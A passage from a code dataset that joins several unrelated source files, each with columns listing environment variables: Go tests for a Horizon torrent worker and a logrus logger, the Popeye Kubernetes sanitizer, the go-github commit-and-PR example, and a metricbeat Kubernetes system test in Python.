		t.Fatalf("Suite setup failed: envvar HORIZON_TEST_DOCKER_CREDFILE_PATH not set (it must point to a docker config file with creds for summit.hovitos.engineering)")
} else {
t.Logf("Using docker cred config file: %v (identified by envvar HORIZON_TEST_DOCKER_CREDFILE_PATH)", os.Getenv("HORIZON_TEST_DOCKER_CREDFILE_PATH"))
}
cfg := config.HorizonConfig{
Edge: config.Config{
DockerEndpoint: "unix:///var/run/docker.sock",
DockerCredFilePath: dockerCredFile,
DefaultCPUSet: "0-1",
TorrentDir: torrentDir,
ServiceStorage: workloadStorageDir,
// DockerCredFilePath: "/config.json",
PublicKeyPath: path.Join(dir, "validpkgcert.pem"),
// consistent with setup()'s dirs
UserPublicKeyPath: path.Join(dir, "userkeys"),
},
}
// now make collaborators instance and assign it to member in this config
collaborators, err := config.NewCollaborators(cfg)
if err != nil {
return nil
}
cfg.Collaborators = *collaborators
return &cfg
}
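// setup creates a temporary work dir and bolt DB, persists the Bluemix registry auth token as a
// DockerRegistryAuthAttributes entry, and writes the package-signing cert plus the deployment
// signing key/cert fixtures used by the tests.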
func setup(t *testing.T) (string, *bolt.DB, error) {
dir, err := ioutil.TempDir("", "container-")
if err != nil {
return "", nil, err
}
db, err := bolt.Open(path.Join(dir, "anax-int.db"), 0600, &bolt.Options{Timeout: 10 * time.Second})
if err != nil {
return dir, nil, err
}
bxRegToken := os.Getenv("HORIZON_TEST_BX_DOCKER_REG_TOKEN")
if bxRegToken == "" {
		t.Fatalf("Suite setup failed: envvar HORIZON_TEST_BX_DOCKER_REG_TOKEN not set (it must contain a token for the bluemix-hosted docker registry to authenticate when pulling images stored there)")
} else {
t.Logf("Using bx docker registry token: %v (identified by envvar HORIZON_TEST_BX_DOCKER_REG_TOKEN)", os.Getenv("HORIZON_TEST_BX_DOCKER_REG_TOKEN"))
}
tt := true
ff := false
// add the bluemix registry token as an attribute
attr := &persistence.DockerRegistryAuthAttributes{
Token: bxRegToken,
Meta: &persistence.AttributeMeta{
Id: "bxauth",
Label: "bxauth",
Type: "DockerRegistryAuthAttributes",
SensorUrls: []string{"registry.ng.bluemix.net"},
HostOnly: &tt,
Publishable: &ff,
},
}
if _, err := persistence.SaveOrUpdateAttribute(db, attr, "", false); err != nil {
t.Logf("error persisting bxauth: %v", err)
panic(err)
}
err = ioutil.WriteFile(path.Join(dir, "validpkgcert.pem"), []byte(validPkgSigningCert), 0644)
if err != nil {
return dir, nil, err
}
certpath := path.Join(dir, "userkeys")
if err := os.MkdirAll(certpath, 0755); err != nil {
panic(err)
}
keypath := path.Join(dir, "private")
if err := os.MkdirAll(keypath, 0755); err != nil {
panic(err)
}
err = ioutil.WriteFile(path.Join(certpath, "validdepcert.pem"), []byte(validTestDeploymentCert), 0644)
if err != nil {
return dir, nil, err
}
err = ioutil.WriteFile(path.Join(keypath, "validprivatekey.pem"), []byte(validTestPrivKey), 0644)
if err != nil {
return dir, nil, err
}
return dir, db, nil
}
func tWorker(config *config.HorizonConfig, db *bolt.DB) *TorrentWorker {
tw := NewTorrentWorker("tworker", config, db)
return tw
}
func tMsg(messages chan events.Message, expectedEvent events.EventId, t *testing.T) *events.TorrentMessage {
// block on this read
msg := <-messages
switch msg.(type) {
case *events.TorrentMessage:
m, _ := msg.(*events.TorrentMessage)
if m.Event().Id == expectedEvent {
t.Logf("m: %v", m)
return m
} else {
			t.Errorf("Execution failed. Original message: %v, type: %T; TorrentMessage asserted: %v", msg, msg, m)
return nil
}
default:
t.Errorf("%v", msg)
return nil
}
}
func tCleanup(t *testing.T, worker *TorrentWorker, images []string) {
t.Logf("Cleaning up: %v", images)
for _, image := range images {
err := worker.client.RemoveImage(image)
if err != nil {
t.Errorf("ERROR: cleanup failed for docker image, it was supposed to be there and perhaps wasn't. Expected to find: %v", image)
}
}
}
func Test_Torrent_Event_Suite(suite *testing.T) {
dir, db, err := setup(suite)
assert.Nil(suite, err)
defer os.RemoveAll(dir)
config := tConfig(suite, dir)
worker := tWorker(config, db)
env := make(map[string]string, 0)
ur, _ := url.Parse("http://1DD40.http.tor01.cdn.softlayer.net/horizon-test-ci/4bf023c831cff7924378e79a4c51cd426b1ea442.json")
resp, err := http.Get("http://1DD40.http.tor01.cdn.softlayer.net/horizon-test-ci/4bf023c831cff7924378e79a4c51cd426b1ea442.json.sig")
assert.Nil(suite, err)
assert.EqualValues(suite, http.StatusOK, resp.StatusCode)
defer resp.Body.Close()
sigBytes, err := ioutil.ReadAll(resp.Body)
assert.Nil(suite, err)
images := []string{
"summit.hovitos.engineering/amd64/neo4j:3.3.1", // 189MB
"summit.hovitos.engineering/amd64/clojure:boot-2.7.2-alpine", // 147MB
"ubuntu:yakkety", // 107MB
"registry.ng.bluemix.net/glendarling/x86/cpu:1.2.1", // 9MB
}
var buf bytes.Buffer
for ix, image := range images {
repotag := strings.Split(image, ":")
repo := repotag[0]
var sname string
if strings.Contains(repo, "/") {
			parts := strings.Split(repo, "/")
			sname = parts[len(parts)-1]
} else {
sname = repo
}
buf.WriteString(fmt.Sprintf("\"%s\":{\"image\":\"%s\"}", sname, image))
if ix != len(images)-1 {
buf.WriteString(",")
}
}
deployment := fmt.Sprintf("{\"services\":{%s}}", buf.String())
dSig, err := sign.Input(path.Join(dir, "private", "validprivatekey.pem"), []byte(deployment))
assert.Nil(suite, err)
// N.B. the following tests use this suite setup; there is cleanup between each
suite.Run("Torrent event with torrent url and signature causes Horizon Pkg pull", func(t *testing.T) {
defer tCleanup(t, worker, images)
cfg := events.NewContainerConfig(*ur, string(sigBytes), deployment, dSig, "", "")
cmd := worker.NewFetchCommand(&events.ContainerLaunchContext{
Configure: *cfg,
EnvironmentAdditions: &env,
Blockchain: events.BlockchainConfig{"", "", ""},
Name: "Pkg fetch test",
})
worker.Commands <- cmd
tMsg(worker.Messages(), events.IMAGE_FETCHED, t)
// do it again to make sure the load skip behavior works
cmdAgain := worker.NewFetchCommand(&events.ContainerLaunchContext{
Configure: *cfg,
EnvironmentAdditions: &env,
Blockchain: events.BlockchainConfig{"", "", ""},
Name: "Pkg fetch test 2 (a clone)",
})
worker.Commands <- cmdAgain
// TODO: consider adding an event that distinguishes this case (already exists in docker images repo) from newly-pulled
tMsg(worker.Messages(), events.IMAGE_FETCHED, t)
})
suite.Run("Torrent event without torrent url and signature causes Docker pull (w/ authentication)", func(t *testing.T) {
defer tCleanup(t, worker, images)
emptyUr, _ := url.Parse("")
// N.B. empty torrent URL and empty torrent signature mean docker pull should be used
cfg := events.NewContainerConfig(*emptyUr, "", deployment, dSig, "", "")
cmd := worker.NewFetchCommand(&events.ContainerLaunchContext{
Configure: *cfg,
EnvironmentAdditions: &env,
Blockchain: events.BlockchainConfig{"", "", ""},
Name: "Authenticated docker pull test",
})
worker.Commands <- cmd
tMsg(worker.Messages(), events.IMAGE_FETCHED, t)
})
}
| [
"\"HORIZON_TEST_DOCKER_CREDFILE_PATH\"",
"\"HORIZON_TEST_DOCKER_CREDFILE_PATH\"",
"\"HORIZON_TEST_BX_DOCKER_REG_TOKEN\"",
"\"HORIZON_TEST_BX_DOCKER_REG_TOKEN\""
]
| []
| [
"HORIZON_TEST_DOCKER_CREDFILE_PATH",
"HORIZON_TEST_BX_DOCKER_REG_TOKEN"
]
| [] | ["HORIZON_TEST_DOCKER_CREDFILE_PATH", "HORIZON_TEST_BX_DOCKER_REG_TOKEN"] | go | 2 | 0 | |
pkg/popeye.go | package pkg
import (
"bufio"
"bytes"
"context"
"encoding/xml"
"errors"
"fmt"
"io"
"os"
"path/filepath"
"sort"
"time"
"github.com/aws/aws-sdk-go/aws"
"github.com/aws/aws-sdk-go/aws/session"
"github.com/aws/aws-sdk-go/service/s3/s3manager"
"github.com/derailed/popeye/internal"
"github.com/derailed/popeye/internal/issues"
"github.com/derailed/popeye/internal/k8s"
"github.com/derailed/popeye/internal/report"
"github.com/derailed/popeye/internal/sanitize"
"github.com/derailed/popeye/internal/scrub"
"github.com/derailed/popeye/pkg/config"
"github.com/rs/zerolog"
"github.com/rs/zerolog/log"
)
var (
// LogFile the path to our logs.
	LogFile = filepath.Join(os.TempDir(), "popeye.log")
	// DumpDir indicates a directory location for sanitizer reports.
DumpDir = dumpDir()
)
const outFmt = "sanitizer_%s_%d.%s"
func (p *Popeye) fileName() string {
return fmt.Sprintf(outFmt, p.client.ActiveCluster(), time.Now().UnixNano(), p.fileExt())
}
func (p *Popeye) fileExt() string {
switch *p.flags.Output {
case "json":
return "json"
case "junit":
return "xml"
case "yaml":
return "yml"
case "html":
return "html"
default:
return "txt"
}
}
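// dumpDir returns the directory used for sanitizer report dumps, honoring the POPEYE_REPORT_DIR override.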
func dumpDir() string {
if d := os.Getenv("POPEYE_REPORT_DIR"); d != "" {
return d
}
return filepath.Join(os.TempDir(), "popeye")
}
type (
scrubFn func(context.Context, *scrub.Cache, *issues.Codes) scrub.Sanitizer
// Popeye a kubernetes sanitizer.
Popeye struct {
client *k8s.Client
config *config.Config
outputTarget io.ReadWriteCloser
log *zerolog.Logger
flags *config.Flags
builder *report.Builder
aliases *internal.Aliases
}
)
// NewPopeye returns a new sanitizer.
func NewPopeye(flags *config.Flags, log *zerolog.Logger) (*Popeye, error) {
cfg, err := config.NewConfig(flags)
if err != nil {
return nil, err
}
a := internal.NewAliases()
p := Popeye{
client: k8s.NewClient(flags),
config: cfg,
log: log,
flags: flags,
aliases: a,
builder: report.NewBuilder(a),
}
return &p, nil
}
// Init configures popeye prior to sanitization.
func (p *Popeye) Init() error {
if !isSet(p.flags.Save) {
return p.ensureOutput()
}
if err := ensurePath(DumpDir, 0755); err != nil {
return err
}
return p.ensureOutput()
}
// Sanitize scans a cluster for potential issues.
func (p *Popeye) Sanitize() error {
defer func() {
switch {
case isSet(p.flags.Save):
if err := p.outputTarget.Close(); err != nil {
log.Fatal().Err(err).Msg("Closing report")
}
case isSetStr(p.flags.S3Bucket):
// Create a single AWS session (we can re use this if we're uploading many files)
s, err := session.NewSession(&aws.Config{
LogLevel: aws.LogLevel(aws.LogDebugWithRequestErrors)})
if err != nil {
log.Fatal().Err(err).Msg("Create S3 Session")
}
// Create an uploader with the session and default options
uploader := s3manager.NewUploader(s)
// Upload input parameters
upParams := &s3manager.UploadInput{
Bucket: p.flags.S3Bucket,
Key: aws.String(p.fileName()),
Body: p.outputTarget,
}
// Perform an upload.
if _, err = uploader.Upload(upParams); err != nil {
log.Fatal().Err(err).Msg("S3 Upload")
}
default:
}
}()
if err := p.sanitize(); err != nil {
return err
}
return p.dump(true)
}
func (p *Popeye) dumpJunit() error {
res, err := p.builder.ToJunit(config.Level(p.config.LinterLevel()))
if err != nil {
return err
}
if _, err := p.outputTarget.Write([]byte(xml.Header)); err != nil {
return err
}
fmt.Fprintf(p.outputTarget, "%v\n", res)
return nil
}
func (p *Popeye) dumpYAML() error {
res, err := p.builder.ToYAML()
if err != nil {
return err
}
fmt.Fprintf(p.outputTarget, "%v\n", res)
return nil
}
func (p *Popeye) dumpJSON() error {
res, err := p.builder.ToJSON()
if err != nil {
return err
}
fmt.Fprintf(p.outputTarget, "%v\n", res)
return nil
}
func (p *Popeye) dumpHTML() error {
res, err := p.builder.ToHTML()
if err != nil {
return err
}
fmt.Fprintf(p.outputTarget, "%v\n", res)
return nil
}
func (p *Popeye) dumpScore() error {
res, err := p.builder.ToScore()
if err != nil {
return err
}
fmt.Fprintf(p.outputTarget, "%v\n", res)
return nil
}
func (p *Popeye) dumpStd(mode, header bool) error {
var (
w = bufio.NewWriter(p.outputTarget)
s = report.NewSanitizer(w, mode)
)
if header {
p.builder.PrintHeader(s)
}
mx, err := p.client.ClusterHasMetrics()
if err != nil {
mx = false
}
p.builder.PrintClusterInfo(s, p.client.ActiveCluster(), mx)
p.builder.PrintReport(config.Level(p.config.LinterLevel()), s)
p.builder.PrintSummary(s)
return w.Flush()
}
func (p *Popeye) dumpPrometheus() error {
pusher := p.builder.ToPrometheus(
p.flags.PushGatewayAddress,
p.client.ActiveNamespace(),
)
return pusher.Add()
}
// Dump prints out sanitizer report.
func (p *Popeye) dump(printHeader bool) error {
if !p.builder.HasContent() {
return errors.New("Nothing to report, check section name or permissions")
}
p.builder.SetClusterName(p.client.ActiveCluster())
var err error
switch p.flags.OutputFormat() {
case report.JunitFormat:
err = p.dumpJunit()
case report.YAMLFormat:
err = p.dumpYAML()
case report.JSONFormat:
err = p.dumpJSON()
case report.HTMLFormat:
err = p.dumpHTML()
case report.PrometheusFormat:
err = p.dumpPrometheus()
case report.ScoreFormat:
err = p.dumpScore()
default:
err = p.dumpStd(p.flags.OutputFormat() == report.JurassicFormat, printHeader)
}
return err
}
func (p *Popeye) sanitizers() map[string]scrubFn {
return map[string]scrubFn{
"cluster": scrub.NewCluster,
"configmap": scrub.NewConfigMap,
"secret": scrub.NewSecret,
"deployment": scrub.NewDeployment,
"daemonset": scrub.NewDaemonSet,
"horizontalpodautoscaler": scrub.NewHorizontalPodAutoscaler,
"namespace": scrub.NewNamespace,
"node": scrub.NewNode,
"persistentvolume": scrub.NewPersistentVolume,
"persistentvolumeclaim": scrub.NewPersistentVolumeClaim,
"pod": scrub.NewPod,
"replicaset": scrub.NewReplicaSet,
"service": scrub.NewService,
"serviceaccount": scrub.NewServiceAccount,
"statefulset": scrub.NewStatefulSet,
"poddisruptionbudget": scrub.NewPodDisruptionBudget,
"ingress": scrub.NewIngress,
"networkpolicy": scrub.NewNetworkPolicy,
"podsecuritypolicy": scrub.NewPodSecurityPolicy,
"clusterrole": scrub.NewClusterRole,
"clusterrolebinding": scrub.NewClusterRoleBinding,
"role": scrub.NewRole,
"rolebinding": scrub.NewRoleBinding,
}
}
type readWriteCloser struct {
io.ReadWriter
}
// Close close read stream.
func (wC readWriteCloser) Close() error {
return nil
}
// NopWriter fake writer.
func NopWriter(i io.ReadWriter) io.ReadWriteCloser {
return &readWriteCloser{i}
}
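// ensureOutput selects the report destination: stdout by default, a file under DumpDir when
// saving is enabled, or an in-memory buffer that is later uploaded to S3.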
func (p *Popeye) ensureOutput() error {
p.outputTarget = os.Stdout
if !isSet(p.flags.Save) && !isSetStr(p.flags.S3Bucket) {
return nil
}
	if p.flags.Output == nil {
		out := "standard"
		p.flags.Output = &out
	}
var (
f io.ReadWriteCloser
err error
)
switch {
case isSet(p.flags.Save):
fPath := filepath.Join(DumpDir, p.fileName())
f, err = os.Create(fPath)
if err != nil {
return err
}
fmt.Println(fPath)
case isSetStr(p.flags.S3Bucket):
f = NopWriter(bytes.NewBufferString(""))
}
p.outputTarget = f
return nil
}
func (p *Popeye) sanitize() error {
ctx, cancel := context.WithCancel(context.Background())
defer cancel()
ctx = context.WithValue(
ctx,
sanitize.PopeyeKey("OverAllocs"),
*p.flags.CheckOverAllocs,
)
cache := scrub.NewCache(p.client, p.config)
codes, err := issues.LoadCodes()
if err != nil {
return err
}
codes.Refine(p.config.Codes)
sections := make([]string, 0, len(p.sanitizers()))
for section := range p.sanitizers() {
sections = append(sections, section)
}
sort.StringSlice(sections).Sort()
for _, section := range sections {
if !in(p.aliases.ToResources(p.config.Sections()), section) {
continue
}
// Skip node checks if active namespace is set.
if section == "node" && p.client.ActiveNamespace() != "" {
continue
}
ctx = context.WithValue(ctx, internal.KeyRun, internal.RunInfo{Section: section})
s := p.sanitizers()[section](ctx, cache, codes)
if err := s.Sanitize(ctx); err != nil {
p.builder.AddError(err)
continue
}
o := s.Outcome().Filter(config.Level(p.config.LinterLevel()))
tally := report.NewTally()
tally.Rollup(o)
p.builder.AddSection(section, o, tally)
}
return nil
}
// ----------------------------------------------------------------------------
// Helpers...
func isSet(b *bool) bool {
return b != nil && *b
}
func isSetStr(s *string) bool {
return s != nil && *s != ""
}
func ensurePath(path string, mod os.FileMode) error {
dir, err := filepath.Abs(path)
if err != nil {
return err
}
_, err = os.Stat(dir)
if err == nil || !os.IsNotExist(err) {
return nil
}
if err = os.MkdirAll(dir, mod); err != nil {
return fmt.Errorf("Fail to create popeye sanitizers dump dir: %v", err)
}
return nil
}
func in(list []string, member string) bool {
if len(list) == 0 {
return true
}
for _, m := range list {
if m == member {
return true
}
}
return false
}
| [
"\"POPEYE_REPORT_DIR\""
]
| []
| [
"POPEYE_REPORT_DIR"
]
| [] | ["POPEYE_REPORT_DIR"] | go | 1 | 0 | |
vendor/github.com/google/go-github/example/commitpr/main.go | // Copyright 2018 The go-github AUTHORS. All rights reserved.
//
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// The commitpr command utilizes go-github as a CLI tool for
// pushing files to a branch and creating a pull request from it.
// It takes an auth token as an environment variable and creates
// the commit and the PR under the account affiliated with that token.
//
// The purpose of this example is to show how to use refs, trees and commits to
// create commits and pull requests.
//
// Note, if you want to push a single file, you probably prefer to use the
// content API. An example is available here:
// https://godoc.org/github.com/google/go-github/github#example-RepositoriesService-CreateFile
//
// Note, for this to work at least 1 commit is needed, so you if you use this
// after creating a repository you might want to make sure you set `AutoInit` to
// `true`.
package main
import (
"context"
"errors"
"flag"
"fmt"
"io/ioutil"
"log"
"os"
"strings"
"time"
"github.com/google/go-github/v26/github"
"golang.org/x/oauth2"
)
var (
sourceOwner = flag.String("source-owner", "", "Name of the owner (user or org) of the repo to create the commit in.")
sourceRepo = flag.String("source-repo", "", "Name of repo to create the commit in.")
commitMessage = flag.String("commit-message", "", "Content of the commit message.")
	commitBranch = flag.String("commit-branch", "", "Name of branch to create the commit in. If it does not already exist, it will be created using the `base-branch` parameter")
baseBranch = flag.String("base-branch", "master", "Name of branch to create the `commit-branch` from.")
prRepoOwner = flag.String("merge-repo-owner", "", "Name of the owner (user or org) of the repo to create the PR against. If not specified, the value of the `-source-owner` flag will be used.")
prRepo = flag.String("merge-repo", "", "Name of repo to create the PR against. If not specified, the value of the `-source-repo` flag will be used.")
prBranch = flag.String("merge-branch", "master", "Name of branch to create the PR against (the one you want to merge your branch in via the PR).")
prSubject = flag.String("pr-title", "", "Title of the pull request. If not specified, no pull request will be created.")
prDescription = flag.String("pr-text", "", "Text to put in the description of the pull request.")
sourceFiles = flag.String("files", "", `Comma-separated list of files to commit and their location.
The local file is separated by its target location by a semi-colon.
If the file should be in the same location with the same name, you can just put the file name and omit the repetition.
Example: README.md,main.go:github/examples/commitpr/main.go`)
authorName = flag.String("author-name", "", "Name of the author of the commit.")
authorEmail = flag.String("author-email", "", "Email of the author of the commit.")
)
var client *github.Client
var ctx = context.Background()
// getRef returns the commit branch reference object if it exists or creates it
// from the base branch before returning it.
func getRef() (ref *github.Reference, err error) {
if ref, _, err = client.Git.GetRef(ctx, *sourceOwner, *sourceRepo, "refs/heads/"+*commitBranch); err == nil {
return ref, nil
}
// We consider that an error means the branch has not been found and needs to
// be created.
if *commitBranch == *baseBranch {
return nil, errors.New("The commit branch does not exist but `-base-branch` is the same as `-commit-branch`")
}
if *baseBranch == "" {
		return nil, errors.New("The `-base-branch` should not be set to an empty string when the branch specified by `-commit-branch` does not exist")
}
var baseRef *github.Reference
if baseRef, _, err = client.Git.GetRef(ctx, *sourceOwner, *sourceRepo, "refs/heads/"+*baseBranch); err != nil {
return nil, err
}
newRef := &github.Reference{Ref: github.String("refs/heads/" + *commitBranch), Object: &github.GitObject{SHA: baseRef.Object.SHA}}
ref, _, err = client.Git.CreateRef(ctx, *sourceOwner, *sourceRepo, newRef)
return ref, err
}
// getTree generates the tree to commit based on the given files and the commit
// of the ref you got in getRef.
func getTree(ref *github.Reference) (tree *github.Tree, err error) {
// Create a tree with what to commit.
entries := []github.TreeEntry{}
// Load each file into the tree.
for _, fileArg := range strings.Split(*sourceFiles, ",") {
file, content, err := getFileContent(fileArg)
if err != nil {
return nil, err
}
entries = append(entries, github.TreeEntry{Path: github.String(file), Type: github.String("blob"), Content: github.String(string(content)), Mode: github.String("100644")})
}
tree, _, err = client.Git.CreateTree(ctx, *sourceOwner, *sourceRepo, *ref.Object.SHA, entries)
return tree, err
}
// getFileContent loads the local content of a file and return the target name
// of the file in the target repository and its contents.
func getFileContent(fileArg string) (targetName string, b []byte, err error) {
var localFile string
files := strings.Split(fileArg, ":")
switch {
case len(files) < 1:
return "", nil, errors.New("empty `-files` parameter")
case len(files) == 1:
localFile = files[0]
targetName = files[0]
default:
localFile = files[0]
targetName = files[1]
}
b, err = ioutil.ReadFile(localFile)
return targetName, b, err
}
// pushCommit creates a commit from the given tree and updates the reference to point at it.
func pushCommit(ref *github.Reference, tree *github.Tree) (err error) {
// Get the parent commit to attach the commit to.
parent, _, err := client.Repositories.GetCommit(ctx, *sourceOwner, *sourceRepo, *ref.Object.SHA)
if err != nil {
return err
}
// This is not always populated, but is needed.
parent.Commit.SHA = parent.SHA
// Create the commit using the tree.
date := time.Now()
author := &github.CommitAuthor{Date: &date, Name: authorName, Email: authorEmail}
commit := &github.Commit{Author: author, Message: commitMessage, Tree: tree, Parents: []github.Commit{*parent.Commit}}
newCommit, _, err := client.Git.CreateCommit(ctx, *sourceOwner, *sourceRepo, commit)
if err != nil {
return err
}
	// Point the branch reference at the new commit.
ref.Object.SHA = newCommit.SHA
_, _, err = client.Git.UpdateRef(ctx, *sourceOwner, *sourceRepo, ref, false)
return err
}
// createPR creates a pull request. Based on: https://godoc.org/github.com/google/go-github/github#example-PullRequestsService-Create
func createPR() (err error) {
if *prSubject == "" {
return errors.New("missing `-pr-title` flag; skipping PR creation")
}
if *prRepoOwner != "" && *prRepoOwner != *sourceOwner {
*commitBranch = fmt.Sprintf("%s:%s", *sourceOwner, *commitBranch)
} else {
prRepoOwner = sourceOwner
}
if *prRepo == "" {
prRepo = sourceRepo
}
newPR := &github.NewPullRequest{
Title: prSubject,
Head: commitBranch,
Base: prBranch,
Body: prDescription,
MaintainerCanModify: github.Bool(true),
}
pr, _, err := client.PullRequests.Create(ctx, *prRepoOwner, *prRepo, newPR)
if err != nil {
return err
}
fmt.Printf("PR created: %s\n", pr.GetHTMLURL())
return nil
}
func main() {
flag.Parse()
token := os.Getenv("GITHUB_AUTH_TOKEN")
if token == "" {
log.Fatal("Unauthorized: No token present")
}
if *sourceOwner == "" || *sourceRepo == "" || *commitBranch == "" || *sourceFiles == "" || *authorName == "" || *authorEmail == "" {
log.Fatal("You need to specify a non-empty value for the flags `-source-owner`, `-source-repo`, `-commit-branch`, `-files`, `-author-name` and `-author-email`")
}
ts := oauth2.StaticTokenSource(&oauth2.Token{AccessToken: token})
tc := oauth2.NewClient(ctx, ts)
client = github.NewClient(tc)
ref, err := getRef()
if err != nil {
log.Fatalf("Unable to get/create the commit reference: %s\n", err)
}
if ref == nil {
log.Fatalf("No error where returned but the reference is nil")
}
tree, err := getTree(ref)
if err != nil {
log.Fatalf("Unable to create the tree based on the provided files: %s\n", err)
}
if err := pushCommit(ref, tree); err != nil {
log.Fatalf("Unable to create the commit: %s\n", err)
}
if err := createPR(); err != nil {
log.Fatalf("Error while creating the pull request: %s", err)
}
}
| [
"\"GITHUB_AUTH_TOKEN\""
]
| []
| [
"GITHUB_AUTH_TOKEN"
]
| [] | ["GITHUB_AUTH_TOKEN"] | go | 1 | 0 | |
vendor/github.com/elastic/beats/metricbeat/tests/system/test_kubernetes.py | import os
import metricbeat
import unittest
KUBERNETES_FIELDS = metricbeat.COMMON_FIELDS + ["kubernetes"]
class Test(metricbeat.BaseTest):
@unittest.skipUnless(metricbeat.INTEGRATION_TESTS, "integration test")
def test_kubelet_node(self):
""" Kubernetes kubelet node metricset tests """
self._test_metricset('node', 1, self.get_kubelet_hosts())
@unittest.skipUnless(metricbeat.INTEGRATION_TESTS, "integration test")
def test_kubelet_system(self):
""" Kubernetes kubelet system metricset tests """
self._test_metricset('system', 2, self.get_kubelet_hosts())
@unittest.skipUnless(metricbeat.INTEGRATION_TESTS, "integration test")
def test_kubelet_pod(self):
""" Kubernetes kubelet pod metricset tests """
self._test_metricset('pod', 1, self.get_kubelet_hosts())
@unittest.skipUnless(metricbeat.INTEGRATION_TESTS, "integration test")
def test_kubelet_container(self):
""" Kubernetes kubelet container metricset tests """
self._test_metricset('container', 1, self.get_kubelet_hosts())
@unittest.skipUnless(metricbeat.INTEGRATION_TESTS, "integration test")
def test_state_node(self):
""" Kubernetes state node metricset tests """
self._test_metricset('state_node', 1, self.get_kube_state_hosts())
@unittest.skipUnless(metricbeat.INTEGRATION_TESTS, "integration test")
def test_state_pod(self):
""" Kubernetes state pod metricset tests """
self._test_metricset('state_pod', 1, self.get_kube_state_hosts())
@unittest.skipUnless(metricbeat.INTEGRATION_TESTS, "integration test")
def test_state_container(self):
""" Kubernetes state container metricset tests """
self._test_metricset('state_container', 1, self.get_kube_state_hosts())
def _test_metricset(self, metricset, expected_events, hosts):
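        # Render a kubernetes module config for the given metricset, start metricbeat and wait for
        # output, then verify the log is clean and the events match the expected count and documented fields.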
self.render_config_template(modules=[{
"name": "kubernetes",
"enabled": "true",
"metricsets": [metricset],
"hosts": hosts,
"period": "5s"
}])
proc = self.start_beat()
self.wait_until(lambda: self.output_lines() > 0)
proc.check_kill_and_wait()
# Ensure no errors or warnings exist in the log.
log = self.get_log()
self.assertNotRegexpMatches(log.replace("WARN BETA", ""), "ERR|WARN")
output = self.read_output_json()
self.assertEqual(len(output), expected_events)
evt = output[0]
self.assertItemsEqual(self.de_dot(KUBERNETES_FIELDS), evt.keys(), evt)
self.assert_fields_are_documented(evt)
@classmethod
def get_kubelet_hosts(cls):
return [
"http://" +
os.getenv('KUBELET_HOST', 'localhost') + ':' +
os.getenv('KUBELET_PORT', '10255')
]
@classmethod
def get_kube_state_hosts(cls):
return [
"http://" +
os.getenv('KUBE_STATE_METRICS_HOST', 'localhost') + ':' +
os.getenv('KUBE_STATE_METRICS_PORT', '18080')
]
| []
| []
| [
"KUBE_STATE_METRICS_PORT",
"KUBE_STATE_METRICS_HOST",
"KUBELET_PORT",
"KUBELET_HOST"
]
| [] | ["KUBE_STATE_METRICS_PORT", "KUBE_STATE_METRICS_HOST", "KUBELET_PORT", "KUBELET_HOST"] | python | 4 | 0 | |
pkg/logger/logrus_test.go | package logger
import (
"bytes"
"encoding/json"
"os"
"strconv"
"strings"
"testing"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
)
const (
withJSON bool = true
withoutJSON bool = false
)
func logAndAssertContent(
t *testing.T,
config *Config,
log func(Logger),
withExpectedContent bool,
) {
var buffer bytes.Buffer
b := NewBuilder(config)
lLogger, err := b.BuildTestLogger(&buffer)
require.Nil(t, err)
log(lLogger)
content := buffer.String()
withActualContent := content != ""
assert.Equal(t, withExpectedContent, withActualContent)
}
func logAndAssertJSONFields(
t *testing.T,
config *Config,
log func(Logger),
assertions func(fields Fields),
) {
var buffer bytes.Buffer
var fields Fields
b := NewBuilder(config)
lLogger, err := b.BuildTestLogger(&buffer)
require.Nil(t, err)
log(lLogger)
err = json.Unmarshal(buffer.Bytes(), &fields)
assert.Nil(t, err)
assertions(fields)
}
func logAndAssertTextFields(
t *testing.T,
config *Config,
log func(Logger),
assertions func(fields map[string]string),
) {
var buffer bytes.Buffer
b := NewBuilder(config)
lLogger, err := b.BuildTestLogger(&buffer)
require.Nil(t, err)
log(lLogger)
fields := make(map[string]string)
for _, kv := range strings.Split(strings.TrimRight(buffer.String(), "\n"), " ") {
if !strings.Contains(kv, "=") {
continue
}
kvArr := strings.Split(kv, "=")
key := strings.TrimSpace(kvArr[0])
val := kvArr[1]
if kvArr[1][0] == '"' {
var err error
val, err = strconv.Unquote(val)
require.NoError(t, err)
}
fields[key] = val
}
assertions(fields)
}
func logConfigForTest(withJSONFormat bool) *Config {
return &Config{
ConsoleEnabled: true,
ConsoleJSONFormat: withJSONFormat,
ConsoleLevel: "trace",
}
}
// This test is proving the following:
// - the config enables JSON formatter and the output is a parseable JSON;
// - the config asks for level "trace" and above and the logger has output;
// - the formatter in the SDK is customized and the logger correctly uses those
// key fields;
// - the formatter disables the logrus standard "msg" key in the field and
// the logger correctly doesn't show it;
func TestInfoLevelWithJSONFields(t *testing.T) {
messageContent := "test message"
logAndAssertJSONFields(
t,
logConfigForTest(withJSON),
func(log Logger) {
log.Infof(messageContent)
},
func(fields Fields) {
assert.Nil(t, fields["msg"])
assert.Equal(t, "info", fields["level"])
assert.NotEmpty(t, fields[fieldKeyTime])
assert.Equal(t, messageContent, fields[fieldKeyMsg])
},
)
}
func TestInfoLevelWithTextFields(t *testing.T) {
// Using an underscore as separator to simplify the parser
// in `logAndAssertTextFields`.
messageContent := "test_message"
logAndAssertTextFields(
t,
logConfigForTest(withoutJSON),
func(log Logger) {
log.Infof(messageContent)
},
func(fields map[string]string) {
assert.Empty(t, fields["msg"])
assert.Equal(t, "info", fields["level"])
assert.NotEmpty(t, fields[fieldKeyTime])
assert.Equal(t, messageContent, fields[fieldKeyMsg])
},
)
}
func TestLevelConfiguration(t *testing.T) {
t.Run("RunningWithLoggerInTestEnvironment", func(t *testing.T) {
expected := "test"
actual := os.Getenv("APP_ENV")
assert.Equal(t, expected, actual)
})
messageContent := "test message"
testCases := []struct {
name string
config *Config
log func(log Logger)
withExpectedContent bool
}{
{
name: "WhenConfigLevelIsTraceDebugIsLogged",
config: &Config{
ConsoleEnabled: true,
ConsoleJSONFormat: withJSON,
ConsoleLevel: "trace",
},
log: func(l Logger) {
l.Debugf(messageContent)
},
withExpectedContent: true,
},
{
name: "WhenConfigLevelIsWarnInfoIsNotLogged",
config: &Config{
ConsoleEnabled: true,
ConsoleJSONFormat: withJSON,
ConsoleLevel: "warn",
},
log: func(l Logger) {
l.Infof(messageContent)
},
withExpectedContent: false,
},
}
for _, tc := range testCases {
t.Run(tc.name, func(t *testing.T) {
logAndAssertContent(
t,
tc.config,
tc.log,
tc.withExpectedContent,
)
})
}
}
| [
"\"APP_ENV\""
]
| []
| [
"APP_ENV"
]
